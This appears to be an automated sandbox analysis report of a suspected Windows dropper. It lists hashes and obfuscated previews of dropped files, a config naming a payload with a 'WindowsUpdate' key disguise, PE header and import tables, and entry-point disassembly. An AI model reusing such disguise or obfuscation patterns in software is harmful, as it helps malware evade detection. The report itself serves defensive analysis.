                                                            Preview:LBk10C5325TYW40h7sXHNWaoJ58h..ComboConstants FileConstants..9394eH54r2SmH59329772649xJQgnK74oY24xZaYcrz4jz173293338e2DHs45C6li35gG13GGJvl440ICwz50H16P6476837Ei4y63Tw6LMCmG62Om6sY2Ia..ButtonConstants StructureConstants..9k86ONlpV05GBZ9B7mC8vL90p9jnfBV0cO9Pn750xq9s52q60z16tRz0005A0sNw1n366i53bSY0Dl84675uI30k..ToolbarConstants ToolbarConstants..92ViO23876XSs6aO83d8gtk16pV2f389r20dD42Ep2JmbDTzm43227T40QXJtO508W46K23441z60UCCM7TUI8675n1l0T451re4dpL9EY4WouO1AVS1S8F415Q561sN3Mf522cjAp39Dl20op0Qj508741vHpMz6m019c..FileConstants TreeViewConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):571495
                                                            Entropy (8bit):4.050101452531791
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4F363A080CC5B7DF87865134BEA5A5A8
                                                            SHA1:186AE3A77464644CDA4D0088F2FE47CADA63C411
                                                            SHA-256:3EB7D48ECC57056FD63D437C73E2D97004D83C3F81D9D12FD59F9BD02BAEB47F
                                                            SHA-512:C35F1CE633482418B2FD23D6FAA4FCEB118F90C9C08106E5DAF5E65DFFF81F73FC1B76BFE910A1B3C861EAA3614C07A9A50745A4226FB775C0D7D05FF1D8FAEC
                                                            Malicious:false
                                                            Preview:0x4D5*9]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0_8]]]0E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]790/09*03D6067F33D6067F33D6067F3/**6*8F33*6067F3/**6**F33C6067F3/**6*_F33C6067F3526963683D6067F3]]]]]]]]5045]]4C0/0/]63D64256]]]]]]]]E]]20/0_0/0_]]5*04]]]]]]]]]80/4]]]/]]]07]4]]]4]]0/]]]]2]]06]]]]]]]06]]]]]]]]7]4]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]445804]]/]]]05*04]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):582
                                                            Entropy (8bit):5.529913214319818
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2F2C210833CD14B8EAD0EEEBD118308C
                                                            SHA1:BAB671003DD2BDF41EA415C7FD34CD334FCD74D7
                                                            SHA-256:49482D956DFE1659D6EB46A6540943779A2286A3BDB098CD3408821CBFA6C7BC
                                                            SHA-512:9772264E779E6BE0837BC4AE84C411AAC8D810F6582A7E4A475DF87F4FEF7FBA1A391DBCFB0E181AFCB9BC9F34E0848173A69D13D53B7EC92DE66268FA2B6798
                                                            Malicious:false
                                                            Preview:yrRE1HZhl391H0v198a5rrVLU58T5Ima11ka577E0YxCS3wC900RJ4SWXQc4i31985b91008qAe19y612ywy050..ComboConstants ButtonConstants..Y2Mn5ss695YN141D7UwLG8o50Yn30O3PKmjb8KMd11O15gcBy8378liU18Z1DGI94u9PyRZJ3475B06EP4344T82XF4r18Mp7wOq2584rH0snMtYtB207Fj62eg8t3SH4m2AUfGm9U258..DateTimeConstants BorderConstants..V9MPt1p48z1zq3..UpDownConstants DateTimeConstants..4Qvm49W5pX45QZgZy9T6X0s8zwY0119t7211mW778Z5l41wlYok5l4132ZZ4Ci072127W5m13141q68496p1Hc6GiS76Z5i2W7uAk6..BorderConstants FileConstants..945k347B64Vb115B50k521Gb7T2s9lQtO515F46ZFK5mmX1564n7s7CvUv007f2..ButtonConstants ColorConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):5.607034598914599
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D49513890FB6627AC0EDBE70EECFADCF
                                                            SHA1:E27A186C75DB61200D77ECFD61DE6DF4915A73AD
                                                            SHA-256:DB5D23C7B678C4AA7EC1EFC31C08276B38B98DD1DFC17F64D6963210368E233B
                                                            SHA-512:4F0A5A8FA20BC9C9C1941EC9FF2BDF65093305DE39283867AED1D8AB58CB4B63F2F9F140EE40A1CD4F455AF8368DF93419B625FCD3353C939A808223A47F091D
                                                            Malicious:false
                                                            Preview:s6b6tXEb9X3TJAsDJ2r34Joy..TreeViewConstants FontConstants..GgU5044t42c0lXW8e5p1z96t7Cyb59280E00y1P923gIix6S307p5LYhL976480565Qx1Q5O9203Q90LUlOl7B04WGq5Rpzn1hB7Xi2pkk739d1MLzJ715bvh3q0tSCl02f1L8ST46TA..UpDownConstants ToolbarConstants..0l1G4Qh5N073l76DW2990C43eosFAAT3w4497r6utWpR733D..FileConstants StructureConstants..H8s73W8K9X0Bp30M8vq60x8k1z528Y78H6w4Z22LT5shJJ2ZH709h41VPr87Yeh87St27gM7Lc8654c9O2ngO25a25mJ66Nv63lxb9d7HK8ru5QB6Xc1271G0vG96nywBwJdh50dw66KjLK2w34634P60..ComboConstants FontConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):593
                                                            Entropy (8bit):5.554946572919045
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:CD8691BCAA6705A65F08C872A0AE7BC5
                                                            SHA1:5E27EA4FC964E45D202023F8FC936CC6BA3F8A16
                                                            SHA-256:27C93A8E6BAB6487A5AC8AB450FCDE1725387B5C64B324388D6C773AB669FB46
                                                            SHA-512:F7C9F29E7D474370F458587A00BEAAFB3AAE8A3B84D5912D90C2CC0CBEBDED0C822C1FC2C996EAA94D5CFD906E3E0213F18FA6F7E80FD4F90ED001DD2947BFFA
                                                            Malicious:false
                                                            Preview:01VQwM7xt648M7u3042836G6u2T49906n76fV387412jxzz9hc5743483U69117e8Z722..ButtonConstants FileConstants..94966G9TOzGS6ebo42gyHD63He90uu65uM6s5540267589239496WM07AdI666t6v2Gk875Gu3dXzx68e27O4XR37em46qe3c7Iu76ckS5N71Y4qz46fYr95rMXg8XnkgD301G71M..UpDownConstants ToolTipConstants..tR4Zxd06x9Pp76Z913dan53622t3YtsB0eGC6ZeZ2vT35RrK0ZA3qpeU6296j8054CF7w678xSYp035F0nd59f01n57ZN4L73175Q5519k4821dTaSUxe0A0R8R4JksVEcYFB540459207C6O43WJF39j3..StructureConstants ColorConstants..6NB0UQ4bv2Vn07i6u41973XJD3w71hu9u10J6HHc03zu6DE5g31251uZ3qv8h86Ui9hT81V6auT6U25T01R532WJ..GuiDateTimePicker GuiDateTimePicker..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):539
                                                            Entropy (8bit):5.599725191775324
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:AF0541E9FAE855E7A52E80C9E0405F98
                                                            SHA1:6F7856575250142D114ACA995A9652990C1E0078
                                                            SHA-256:0CBA71E467A718727C02FFC94934340EE623B1504CEABC4FB6D317D2A7AD5F58
                                                            SHA-512:C0CA701BEEC8CD1202C4B006095082C2DDD4EA1EA4F2DC50E9D23F1A18C6AC35C217DC895CBBF5690855F94134AD0143D44D69A36C63228422ECF176BA06FDA5
                                                            Malicious:false
                                                            Preview:p36H6SjF1562QK56348s32gcNz517N5662lv8pdm4r0eAz8fX4r7m2..FontConstants FileConstants..2q1cqu0404NIS9VG8Mjh61D038cdWjhG4w9A5arv4083a2Sl2ZvCi21450k7T1rY4M3695u17x75p78knj1A3551k062y15n0HQ81674XVm278BHqV9BB4..FileConstants ToolTipConstants..8069WkM442S98Ck6X8qEy04FZ559vzE55a622039qW53V3PzpL955..GuiDateTimePicker BorderConstants..6J9p1n1d3W41i957604290382V80Z8d5srf5S9z60zxOC69D2SE23f1xHic64d9uj3tN43atG16aua5en37GmNVB91Ho47EqXr6C2ChWv6F2565oFp2d38N0n6p7P89TKr23C86U2A2T6M0W7qRonO5741bIXaSbkJ65Ro9q071v8..TreeViewConstants GuiDateTimePicker..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):587
                                                            Entropy (8bit):5.52732025652089
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7AFA77936136795EEE474D1427C6860B
                                                            SHA1:F3DD2C335A2A1556EC7E0C4B1A84B879D7871A61
                                                            SHA-256:F2C9099CD19481ADCDF5ACCD3141031DEA2069F4AB946F82E48324390BB7212B
                                                            SHA-512:838A510F9D5D749972277FA36B5F88F4BB2D3A3EFC40004878116D396E0E73CA3A7A3BAC5A086E8AB16BFCEA8FE40B280456CD7B45B09046EE754951B85E9B7B
                                                            Malicious:false
                                                            Preview:z5E82EiiIn4Yt18i7Tiim73D520Mpj99Evsi23x2d3lPtAysi12Y1u7tiw..BorderConstants ToolbarConstants..33q1N513L71427ZT8263TVkkE..StructureConstants ToolbarConstants..9B431z07D8Po264MBdr2oW9ae05oNiv4213K1E3BJh7GPE8WC225227k757d0181d01u3C6i07igd0rGwr8J93Q5j08S21382ol6QtF630X7k90repT9Z14Rt8Md4P..ToolTipConstants FontConstants..7A4y643yf5QC92oL71xa1uN89Wz33011Yj..ButtonConstants StructureConstants..3y8YAG940NwH1ug4idIE9krI8t9U9bN617z7mGoL1K2V7ml35g9..ToolTipConstants GuiDateTimePicker..63428ZGBf9AXr1WjTvh953tIS5QKkGNTP5erclxJ7xc960515C1757g85x6tNg64VzD2063a6..BorderConstants UpDownConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):604
                                                            Entropy (8bit):5.630742912178927
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A7D646B218E8D14309054A445F055721
                                                            SHA1:A9B352E14544F39E52ED37CAE95C133DDE10A166
                                                            SHA-256:4361A6ED7BF9F6ADFEDCD6C211FC5C0759BC0564653E372BC127881974466934
                                                            SHA-512:327C01AE6CDF9844E45ADBFCEBA2B3E3473C1C7F963992B781956FA9F3DE96E19D6570F6AA928CB208732214D339655A8015A19C57D1274723F66C32F56CCB04
                                                            Malicious:false
                                                            Preview:fiPeEIy73Y85..BorderConstants ComboConstants..3931241g3n2m91W539vsJTVwdKfCFt973250V7t3R6SF25u081N938MK56zrya45o6UI94I3043yX6CX88I0F9jV9173zMh0Q9wR835e493H9K47vyX35bBr7..BorderConstants ButtonConstants..76197BO29bpi34bq468HLF86NlMR4g1dLp70h39cAbt38K6z321m9vzWy1x8fvBE7D8z45..GuiDateTimePicker GuiDateTimePicker..D9Ii70c45twVbmF4Ser7wYtbdBe12899ZFZw6i1R3Zu8Yqu078D5R9Y15dfN72p3Oy94P1b2177181O88G10vV94q3vS42C0xS5x76H63xvh76W68280R87l3I19B641vW7h7RWU3871h5615ZR48EyRei..GuiDateTimePicker FontConstants..w4z10485N3Y4gXI0a599f35R30Ap5u46IN96N10G171228d98H332ujaXsD3j9551U..TreeViewConstants ToolbarConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):603
                                                            Entropy (8bit):5.6339556731673985
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E567673511B0E87E9582F248BEBB9132
                                                            SHA1:2DE90139ABE461A9C9CFD885A2FB660EE24224AF
                                                            SHA-256:56EB9CD2AAD3A869A79E63B8867C01364B091892AD984F2C31C8F2426656881B
                                                            SHA-512:366EC7F1DA50C20CCAFA58C967724DF9F57635AB69FB2E5F67F430EACDEDCF67668B7B957DC46C2CF42E6890DE90F80C2EE46656795C90F16DCD4AEE9627023C
                                                            Malicious:false
                                                            Preview:28f6F1j260yp2..GuiDateTimePicker UpDownConstants..DZ146vE8of5Ksk34P7Za5vgSZ0x7aHraa53rs0LwqDzlyAd6ZUhp9uCHx349VYO4n881o91CbDmg6WPC339P20M5O41..FileConstants ComboConstants..8481486m1TM7G0p3h3ScH588GM7Omo6J3444n901cywLe4..DateTimeConstants DateTimeConstants..57lNxaQE9RcW09rU0E44gS0AYE20H9BzsV59fd4N179ekYn3z6L4Qyu5S5088nBWKInCA9xMDh7..ComboConstants ButtonConstants..m2WC817As0fO7ph957p344S52gGPF0..GuiDateTimePicker StructureConstants..132S2238746DkWcN4Fe7Fb53QDtDbvpEyp1r5Mm5c49o9bu5I2V04DRJpE35J1y7Et0k17t1MFd6Az57t18Q5069qQ6u94y1Tb754STR2wbU3CG5v74uNho8aF2ET92B646lx7..FileConstants ComboConstants..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79
                                                            Entropy (8bit):4.913293768025657
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BE6F48E1E7F7A1B12F74BFAB297992D5
                                                            SHA1:5FED72E7B3AA1357F55E8C0E9A8A0DFFC368B0F9
                                                            SHA-256:EB704F1AE1857D3DAA82A5830FE1E38A13358BEB666A32CA277DDCF945DDEBBD
                                                            SHA-512:674DA1F1DF8A6D73932300EE0F0E713D46DCB6484628666A70FAAA541D0F302A17E79B2236D9EC896C198D914537DCDAA01EEB44845B11C8DE9D17F9CF7A711A
                                                            Malicious:false
                                                            Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=dsvk..ExE_c=tguujh.msc..
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.790894891507531
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:uhbrQkYNzx.exe
                                                            File size:1'264'257 bytes
                                                            MD5:c98eea303da1d7b92f96d6a8b62d74d2
                                                            SHA1:1ef9752163fa156a8831d759d2750ca23fa38e26
                                                            SHA256:f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3
                                                            SHA512:7b2d39051e783fc56196b9276b4c3d85fd56c747c4e0b2de2d46dd351082e511b55041d1658811d42a4405f7a2b0655accd32cd045aa65b0f63422c7d90c63b5
                                                            SSDEEP:24576:KN/BUBb+tYjBFHEPxZsoKEKhkiM700m6MnLT3XiM0hD6di/Aw:6pUlRhSELm00tMLDXiM0hDTF
                                                            TLSH:814512127BC48473D17225321FB6975119BC79611F628A8B63D06DBEAB309C2D632FB3
                                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b
                                                            Icon Hash:3b27271313eadc4f
                                                            Entrypoint:0x4265d0
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:99ee65c2db82c04251a5c24f214c8892
                                                            Instruction
                                                            call 00007F08A4D72FCBh
                                                            jmp 00007F08A4D7294Dh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ecx
                                                            lea ecx, dword ptr [esp+08h]
                                                            sub ecx, eax
                                                            and ecx, 0Fh
                                                            add eax, ecx
                                                            sbb ecx, ecx
                                                            or eax, ecx
                                                            pop ecx
                                                            jmp 00007F08A4D71FFFh
                                                            push ecx
                                                            lea ecx, dword ptr [esp+08h]
                                                            sub ecx, eax
                                                            and ecx, 07h
                                                            add eax, ecx
                                                            sbb ecx, ecx
                                                            or eax, ecx
                                                            pop ecx
                                                            jmp 00007F08A4D71FE9h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007F08A4D65529h
                                                            push 0044634Ch
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007F08A4D737F7h
                                                            int3
                                                            jmp 00007F08A4D7952Eh
                                                            int3
                                                            int3
                                                            push 004293C0h
                                                            push dword ptr fs:[00000000h]
                                                            mov eax, dword ptr [esp+10h]
                                                            mov dword ptr [esp+10h], ebp
                                                            lea ebp, dword ptr [esp+10h]
                                                            sub esp, eax
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            mov eax, dword ptr [00449778h]
                                                            xor dword ptr [ebp-04h], eax
                                                            xor eax, ebp
                                                            push eax
                                                            mov dword ptr [ebp-18h], esp
                                                            push dword ptr [ebp-08h]
                                                            mov eax, dword ptr [ebp-04h]
                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                            mov dword ptr [ebp-08h], eax
                                                            lea eax, dword ptr [ebp-10h]
                                                            mov dword ptr fs:[00000000h], eax
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            mov ecx, dword ptr [ebp-10h]
                                                            mov dword ptr fs:[00000000h], ecx
                                                            pop ecx
                                                            pop edi
                                                            pop edi
                                                            pop esi
                                                            pop ebx
                                                            mov esp, ebp
                                                            pop ebp
                                                            push ecx
                                                            ret
                                                            push ebp
                                                            mov ebp, esp
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x47d70          0x34          .rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x47da4          0x50          .rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x58000          0xc398        .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x65000          0x2afc        .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x44580          0x54          .rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS             0x44600          0x18          .rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x3ec58          0x40          .rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT             0x3c000          0x280         .rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x4722c          0x120         .rdata
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                            Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
                                                            .text   0x1000           0x3a32c       0x3a400   e320764e1b3c816ba80aeb820cb8a274  False     0.581381605418455   data       6.685359764265178   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata  0x3c000          0xcbf8        0xcc00    47c3be3304bfdfb2a778f355849d1c3f  False     0.4439529718137255  data       5.167069652624378   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data   0x49000          0xd7e0        0x1200    6335f9314c2900dccb530e151f1b1ee8  False     0.3956163194444444  data       4.0290550032041     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .didat  0x57000          0x1a8         0x200     232a8fe82993b55cefe09cffc39a79b0  False     0.462890625         data       3.5080985761326375  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc   0x58000          0xc398        0xc400    3b0908233482a15c44e0d8b6a6c3707e  False     0.5938097895408163  data       5.923234714497879   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc  0x65000          0x2afc        0x2c00    98fd4bc572f87a21f69dc57f720a6dbc  False     0.75                data       6.617141671767599   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            Name           RVA      Size    Type                                                                    Language  Country        ZLIB Complexity
                                                            PNG            0x58764  0xb45   PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced              English   United States  1.0027729636048528
                                                            PNG            0x592ac  0x15a9  PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced             English   United States  0.9363390441839495
                                                            RT_ICON        0x5a858  0x668   Device independent bitmap graphic, 48 x 96 x 4, image size 1152                                 0.4945121951219512
                                                            RT_ICON        0x5aec0  0x2e8   Device independent bitmap graphic, 32 x 64 x 4, image size 512                                  0.6129032258064516
                                                            RT_ICON        0x5b1a8  0x1e8   Device independent bitmap graphic, 24 x 48 x 4, image size 288                                  0.5840163934426229
                                                            RT_ICON        0x5b390  0x128   Device independent bitmap graphic, 16 x 32 x 4, image size 128                                  0.6317567567567568
                                                            RT_ICON        0x5b4b8  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors           0.6244669509594882
                                                            RT_ICON        0x5c360  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors           0.766245487364621
                                                            RT_ICON        0x5cc08  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors            0.7695852534562212
                                                            RT_ICON        0x5d2d0  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors            0.5664739884393064
                                                            RT_ICON        0x5d838  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9600                                0.5528008298755187
                                                            RT_ICON        0x5fde0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4224                                0.6235928705440901
                                                            RT_ICON        0x60e88  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 2400                                0.6442622950819672
                                                            RT_ICON        0x61810  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1088                                0.7180851063829787
                                                            RT_DIALOG      0x61c78  0x286   data                                                                    English   United States  0.5092879256965944
                                                            RT_DIALOG      0x61f00  0x13a   data                                                                    English   United States  0.60828025477707
                                                            RT_DIALOG      0x6203c  0xec    data                                                                    English   United States  0.6991525423728814
                                                            RT_DIALOG      0x62128  0x12e   data                                                                    English   United States  0.5927152317880795
                                                            RT_DIALOG      0x62258  0x338   data                                                                    English   United States  0.45145631067961167
                                                            RT_DIALOG      0x62590  0x252   data                                                                    English   United States  0.5757575757575758
                                                            RT_STRING      0x627e4  0x1e2   data                                                                    English   United States  0.3900414937759336
                                                            RT_STRING      0x629c8  0x1cc   data                                                                    English   United States  0.4282608695652174
                                                            RT_STRING      0x62b94  0x1b8   data                                                                    English   United States  0.45681818181818185
                                                            RT_STRING      0x62d4c  0x146   data                                                                    English   United States  0.5153374233128835
                                                            RT_STRING      0x62e94  0x46c   data                                                                    English   United States  0.3454063604240283
                                                            RT_STRING      0x63300  0x166   data                                                                    English   United States  0.49162011173184356
                                                            RT_STRING      0x63468  0x152   data                                                                    English   United States  0.5059171597633136
                                                            RT_STRING      0x635bc  0x10a   data                                                                    English   United States  0.49624060150375937
                                                            RT_STRING      0x636c8  0xbc    data                                                                    English   United States  0.6329787234042553
                                                            RT_STRING      0x63784  0x1c0   data                                                                    English   United States  0.5178571428571429
                                                            RT_STRING      0x63944  0x250   data                                                                    English   United States  0.44256756756756754
                                                            RT_GROUP_ICON  0x63b94  0xae    data                                                                                             0.5977011494252874
                                                            RT_MANIFEST    0x63c44  0x753   XML 1.0 document, ASCII text, with CRLF line terminators                English   United States  0.3957333333333333
                                                            DLL           Imports
                                                            KERNEL32.dll  LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                                            OLEAUT32.dll  SysAllocString, SysFreeString, VariantClear
                                                            gdiplus.dll   GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                            Language of compilation system  Country where language is spoken
                                                            English                         United States
                                                            No network behavior found

                                                            Target ID:0
                                                            Start time:13:01:50
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\uhbrQkYNzx.exe"
                                                            Imagebase:0x990000
                                                            File size:1'264'257 bytes
                                                            MD5 hash:C98EEA303DA1D7B92F96D6A8B62D74D2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
